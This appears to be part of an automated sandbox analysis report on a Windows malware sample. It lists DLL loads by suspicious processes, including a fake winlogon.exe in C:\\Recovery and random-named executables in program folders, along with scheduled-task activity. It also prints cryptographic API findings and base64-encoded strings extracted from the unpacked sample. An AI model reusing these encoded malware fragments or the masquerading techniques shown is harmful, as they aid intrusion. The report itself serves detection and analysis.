Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: version.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: version.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sspicli.dll
Source: C:\Recovery\winlogon.exe Section loaded: mscoree.dll
Source: C:\Recovery\winlogon.exe Section loaded: apphelp.dll
Source: C:\Recovery\winlogon.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\winlogon.exe Section loaded: version.dll
Source: C:\Recovery\winlogon.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: uxtheme.dll
Source: C:\Recovery\winlogon.exe Section loaded: windows.storage.dll
Source: C:\Recovery\winlogon.exe Section loaded: wldp.dll
Source: C:\Recovery\winlogon.exe Section loaded: profapi.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptsp.dll
Source: C:\Recovery\winlogon.exe Section loaded: rsaenh.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptbase.dll
Source: C:\Recovery\winlogon.exe Section loaded: sspicli.dll
Source: C:\Recovery\winlogon.exe Section loaded: mscoree.dll
Source: C:\Recovery\winlogon.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\winlogon.exe Section loaded: version.dll
Source: C:\Recovery\winlogon.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: uxtheme.dll
Source: C:\Recovery\winlogon.exe Section loaded: windows.storage.dll
Source: C:\Recovery\winlogon.exe Section loaded: wldp.dll
Source: C:\Recovery\winlogon.exe Section loaded: profapi.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptsp.dll
Source: C:\Recovery\winlogon.exe Section loaded: rsaenh.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptbase.dll
Source: C:\Recovery\winlogon.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: mscoree.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: apphelp.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: version.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: windows.storage.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: wldp.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: profapi.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptsp.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: rsaenh.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Section loaded: sspicli.dll
Source: C:\Recovery\winlogon.exe Section loaded: mscoree.dll
Source: C:\Recovery\winlogon.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\winlogon.exe Section loaded: version.dll
Source: C:\Recovery\winlogon.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\winlogon.exe Section loaded: uxtheme.dll
Source: C:\Recovery\winlogon.exe Section loaded: windows.storage.dll
Source: C:\Recovery\winlogon.exe Section loaded: wldp.dll
Source: C:\Recovery\winlogon.exe Section loaded: profapi.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptsp.dll
Source: C:\Recovery\winlogon.exe Section loaded: rsaenh.dll
Source: C:\Recovery\winlogon.exe Section loaded: cryptbase.dll
Source: C:\Recovery\winlogon.exe Section loaded: sspicli.dll
Source: C:\Recovery\winlogon.exe Section loaded: ktmw32.dll
Source: C:\Recovery\winlogon.exe Section loaded: propsys.dll
Source: C:\Recovery\winlogon.exe Section loaded: edputil.dll
Source: C:\Recovery\winlogon.exe Section loaded: urlmon.dll
Source: C:\Recovery\winlogon.exe Section loaded: iertutil.dll
Source: C:\Recovery\winlogon.exe Section loaded: srvcli.dll
Source: C:\Recovery\winlogon.exe Section loaded: netutils.dll
Source: C:\Recovery\winlogon.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\winlogon.exe Section loaded: wintypes.dll
Source: C:\Recovery\winlogon.exe Section loaded: appresolver.dll
Source: C:\Recovery\winlogon.exe Section loaded: bcp47langs.dll
Source: C:\Recovery\winlogon.exe Section loaded: slc.dll
Source: C:\Recovery\winlogon.exe Section loaded: userenv.dll
Source: C:\Recovery\winlogon.exe Section loaded: sppc.dll
Source: C:\Recovery\winlogon.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Recovery\winlogon.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Recovery\winlogon.exe Section loaded: mpr.dll
Source: C:\Recovery\winlogon.exe Section loaded: pcacli.dll
Source: C:\Recovery\winlogon.exe Section loaded: sfc_os.dll
Uses 32bit PE files
Source: H9gMIu2HXi.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformBlock'
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformBlock'
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Stream5.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, qJk.cs Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, sz3.cs Base64 encoded string: 'IRHKkK7+9S0IugXON3gvLsxJjZL9YaEKz/ItfY2KMibv3HGRDY4HX1+0x6vyRlP1N4gE0v20VeDKoKK009sEy3ouyqPq1nDV7UInHLKa0+i1EzCuhkbBF+hHquku7Lo/yvKfWKTtDSC0cid2m2aAXySLeN9z77QHOw6ohp+EDczjdlkMq8m7a2ClwiEast7dEwz6w4bD8wTSzoz4j5qzrO8RqjmHTyrApuBSl+1gu2s5LoFXoH5oPozdF2hTyr4UJafbA2pNEGdP/VLXgbIg4QM5bvggf+gkojeqw45IqHRg8ZcCDn/xnBJvzaQskNO/n2SyskcGTGC2IHglQTunUGHh4+wEaQYtR4uojeQt1AxtzrO/QY7Xs4yhQpA5ELH1fxkHlN9mBEm06zoECj/vz7jJG2mQlWiHY9U9LUYCXv/lx66c36E3vw4zQ5xVrzhaydHvLiCXt0pZUDFEWfZaVaZ5AKGW0zqkBSvHh4qMXIukrkK1kUF6G2eX26nBF9etwOUvoJ9uQsq2Dy+GQBdk03ZdTGhPoKKJfEvzulE4FSXAoUFrTLyla3gXMOhV434cPyDRSbyiZCGATsBDfEtT+1yp5qKdbJS1GVEo5JVGDZl853Kba/dh4CBx/W6Bj/DOJfimC7NBUJ/HnfsGb830T09NrdXxjZIarRpeDSqLXVWibkiIPnFO4OU2WXtEARxfTEp9gbRaEngqlbHte7O4oMf4xO52NXpTo1ex3oIjKRiCMDA77sbJvezZ+hixbnlgDJbVmAulozOcoeLeIT3ajMgqvfmAPVAXbuYvJdtKwevtf2DUl7lEqIkiitboMQ9wa/o5JrJJMwrsX1U4U56gMIX+zCYsR3sgBH+1dLI394nm8h9oLc/7DXLFKCEkJSnOT6P/PRLwNHmWcoHO0WJ5Y6IdGtC8rsInOmg1aD9JbLPqksSmWRX6XfZYmKthY9wC1SDjDFSXykgutRHU6ciKTBRxlvwAPW8V/yOJ1rOCNpk='
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class17.cs Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class16.cs Base64 encoded string: 'H4sIAAAAAAAEAAHsARP+04uaiZb284OSg9ODhoCBg4CU2I+FhZOLoaT77vyj/qTlq/39/6mq97LktLW39+ys+obq+eb/mKqMjcDPxrrXxdLLrIqAnovN3NOtwdbP1LGZlYme3tHcoDMjOCFCZGp0bSt3Jy5Za2N1dmByeVt5Y3F/f2k+J2U9Q0lDV01BBB0KHx0cHBQYGQgFBREYF1RYTE1VUFlTHAVidnN6cHx+cnl7eHENDAkfGgE0FGEULxosATNiHisrBjk3BRopPTY4LgxdLjpYAU1cUwEWAAEfGR8KWEFereavGlEjUxZVGFcoWRarXCxeFUABQjREBUYMuEkCSwhNBk8+cQCDhfnI7uyTitD5/uv9+fXP79r22drV3NTPhp3F/I+Mj4aKkbubppy5rr6jr6K16/KogYaThZaYl56hgbCPo8GsgomA3MeTuamlraCrkqyfu6PO1Y2+qISmlbu4scUgekVGS3gkKyp6b2VoYGt8Y3B1dnt7dXI6IzhPbmh7PQwDUUZKQUpIT0BETUNeWkpRXVdBFg8UcVlVSV4eERxMNCQjLyE3NSI8PSMlK290bRw+NXM3Ojo7PTouPjgBMBYkW0IYMTYjNSEtFzcCLgECHRQcB05VDTQ3NDc+MikDI+7N7eSk9u/97bOq8N/E1Mrts+/uB8ku4+wBAAA=', 